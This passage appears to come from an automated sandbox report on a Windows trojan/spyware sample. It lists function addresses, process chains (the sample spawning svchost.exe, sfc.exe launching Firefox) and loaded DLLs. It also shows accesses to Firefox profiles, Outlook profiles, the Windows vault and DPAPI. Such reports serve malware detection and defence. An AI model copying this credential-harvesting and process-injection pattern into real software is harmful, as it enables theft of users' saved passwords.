                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DCD1F1_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03048DC01_2_03048DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030317EC1_2_030317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030856301_2_03085630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031095C31_2_031095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B5BF01_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E1AA31_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D59101_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030459901_2_03045990
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD21_2_03003FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03003FD51_2_03003FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374A3523_2_0374A352
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037503E63_2_037503E6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0369E3F03_2_0369E3F0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037102C03_2_037102C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037181583_2_03718158
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036801003_2_03680100
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0372A1183_2_0372A118
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037481CC3_2_037481CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037441A23_2_037441A2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037521AE3_2_037521AE
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037501AA3_2_037501AA
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037220003_2_03722000
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036907703_2_03690770
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036B47503_2_036B4750
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0368C7C03_2_0368C7C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AC6E03_2_036AC6E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036905353_2_03690535
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037505913_2_03750591
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037424463_2_03742446
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037344203_2_03734420
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0373E4F63_2_0373E4F6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374AB403_2_0374AB40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03746BD73_2_03746BD7
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374EB893_2_0374EB89
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0368EA803_2_0368EA80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036A69623_2_036A6962
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036929A03_2_036929A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0369A8403_2_0369A840
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036BE8F03_2_036BE8F0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036768B83_2_036768B8
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03704F403_2_03704F40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03732F303_2_03732F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036D2F283_2_036D2F28
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036B0F303_2_036B0F30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03682FC83_2_03682FC8
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0370EFA03_2_0370EFA0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374EE263_2_0374EE26
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374EEDB3_2_0374EEDB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374CE933_2_0374CE93
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036A2E903_2_036A2E90
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0369AD003_2_0369AD00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0372CD1F3_2_0372CD1F
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0368ADE03_2_0368ADE0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03698DC03_2_03698DC0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036A8DBF3_2_036A8DBF
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03690C003_2_03690C00
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03680CF23_2_03680CF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0367D34C3_2_0367D34C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374132D3_2_0374132D
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AD2F03_2_036AD2F0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037312ED3_2_037312ED
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AB2C03_2_036AB2C0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036952A03_2_036952A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036C516C3_2_036C516C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0367F1723_2_0367F172
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0375B16B3_2_0375B16B
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0369B1B03_2_0369B1B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374F0E03_2_0374F0E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037470E93_2_037470E9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0373F0CC3_2_0373F0CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036817EC3_2_036817EC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374F7B03_2_0374F7B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036D56303_2_036D5630
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037416CC3_2_037416CC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037475713_2_03747571
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037595C33_2_037595C3
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0372D5B03_2_0372D5B0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036814603_2_03681460
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374F43F3_2_0374F43F
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374FB763_2_0374FB76
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03705BF03_2_03705BF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036CDBF93_2_036CDBF9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AFB803_2_036AFB80
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03703A6C3_2_03703A6C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03747A463_2_03747A46
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374FA493_2_0374FA49
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0373DAC63_2_0373DAC6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03731AA33_2_03731AA3
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0372DAAC3_2_0372DAAC
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036999503_2_03699950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AB9503_2_036AB950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_037259103_2_03725910
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036959903_2_03695990
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036FD8003_2_036FD800
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036938E03_2_036938E0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374FF093_2_0374FF09
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03653FD53_2_03653FD5
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03653FD23_2_03653FD2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374FFB13_2_0374FFB1
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03691F923_2_03691F92
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03699EB03_2_03699EB0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03747D733_2_03747D73
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03741D5A3_2_03741D5A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036AFDC03_2_036AFDC0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_03709C323_2_03709C32
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0374FCF23_2_0374FCF2
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA20703_2_00BA2070
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9CEF03_2_00B9CEF0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9CEE93_2_00B9CEE9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9D1103_2_00B9D110
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9B1003_2_00B9B100
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9B2503_2_00B9B250
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9B2443_2_00B9B244
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B913B13_2_00B913B1
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA57503_2_00BA5750
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA39503_2_00BA3950
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA394B3_2_00BA394B
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BBBF303_2_00BBBF30
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033EE2D33_2_033EE2D3
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033EE1B73_2_033EE1B7
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033ED7383_2_033ED738
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033EE6763_2_033EE676
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033EE6713_2_033EE671
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033EE43C3_2_033EE43C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_033ECA433_2_033ECA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 76 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 210 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 98 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 53 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 036C5130 appears 53 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0367B970 appears 210 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 036FEA12 appears 76 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0370F290 appears 98 times
                Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 036D7E54 appears 102 times
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: String function: 000F0AE3 appears 70 times
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: String function: 000D7DE1 appears 35 times
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: String function: 000F8900 appears 36 times
                Source: g1V10ssekg.exe, 00000000.00000003.888240438.0000000003EE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs g1V10ssekg.exe
                Source: g1V10ssekg.exe, 00000000.00000003.889842563.000000000408D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs g1V10ssekg.exe
                Source: g1V10ssekg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/9
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013A06A GetLastError,FormatMessageW,0_2_0013A06A
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001281CB AdjustTokenPrivileges,CloseHandle,0_2_001281CB
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001287E1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0013B333
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0014EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0014EE0D
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0013C397
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000D4E89
                Source: C:\Users\user\Desktop\g1V10ssekg.exeFile created: C:\Users\user\AppData\Local\Temp\autDDC.tmpJump to behavior
                Source: g1V10ssekg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sfc.exe, 00000003.00000003.1350570802.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3332463262.0000000003016000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1351220628.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3332463262.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1354186141.0000000002FF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: g1V10ssekg.exeVirustotal: Detection: 68%
                Source: g1V10ssekg.exeReversingLabs: Detection: 60%
                Source: unknownProcess created: C:\Users\user\Desktop\g1V10ssekg.exe "C:\Users\user\Desktop\g1V10ssekg.exe"
                Source: C:\Users\user\Desktop\g1V10ssekg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\g1V10ssekg.exe"
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\g1V10ssekg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\g1V10ssekg.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: g1V10ssekg.exeStatic file information: File size 1166848 > 1048576
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: g1V10ssekg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: g1V10ssekg.exe, 00000000.00000003.881610884.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, g1V10ssekg.exe, 00000000.00000003.884102443.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1066771274.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068700855.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.000000000319E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1162413276.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.0000000003650000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1166837840.000000000349E000.00000004.00000020.00020000.00000000.sdmp
